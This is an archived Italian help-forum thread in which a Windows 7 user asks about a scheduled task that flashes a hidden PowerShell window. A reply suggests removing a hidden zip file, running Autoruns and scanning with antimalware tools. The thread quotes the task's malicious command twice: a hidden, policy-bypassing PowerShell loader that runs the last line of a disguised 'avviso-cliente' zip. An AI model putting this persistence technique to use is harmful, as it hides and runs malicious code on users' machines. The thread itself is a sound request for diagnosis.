PDA

View Full Version : taskeng powershell si apre ogni 5 minuti e scompare

Perseverance
13-04-2019, 18:39
Ho trovato questa stringa nell'utilità di pianificazione, windows 7, che si manifesta come una finestra taskeng tipo powershell senza scritte, appare e scompare nel giro di mezzo secondo. Il comando che la genera è questo

-nonI -eP bypasS -nOP -win 1 -c &{cd C:\Users\;$p=gci -force -r -in avviso-cliente*.zip|select -last 1;$v=cat -LiteralPat $p.fullname;$v[$v.length-1]|iex}

Cancellando la pianificazione scompare il problema.
Che roba è? Un malware? Tradotto...che dovrebbe fare?

Lomber001
10-05-2019, 18:08
Ho trovato questa stringa nell'utilità di pianificazione, windows 7, che si manifesta come una finestra taskeng tipo powershell senza scritte, appare e scompare nel giro di mezzo secondo. Il comando che la genera è questo

-nonI -eP bypasS -nOP -win 1 -c &{cd C:\Users\;$p=gci -force -r -in avviso-cliente*.zip|select -last 1;$v=cat -LiteralPat $p.fullname;$v[$v.length-1]|iex}

Cancellando la pianificazione scompare il problema.
Che roba è? Un malware? Tradotto...che dovrebbe fare?

Da ciò che mi è apparso capire hai un file .zip in: C:\Users\, cancella qualsiasi zip che trovi in questa directory.. dopo scarica autoruns della microsoft, e elimina i collegamenti nel sistema, (Il file .zip potrebbe essere nascosto).

Sysinternals Downloads Autoruns! (https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)

Per scrupolo fai delle scansioni con Emsisoft Emergency Kit,Malwarebytes,HitmanPro in questo modo sei un pò più sicuro di non aver infezioni.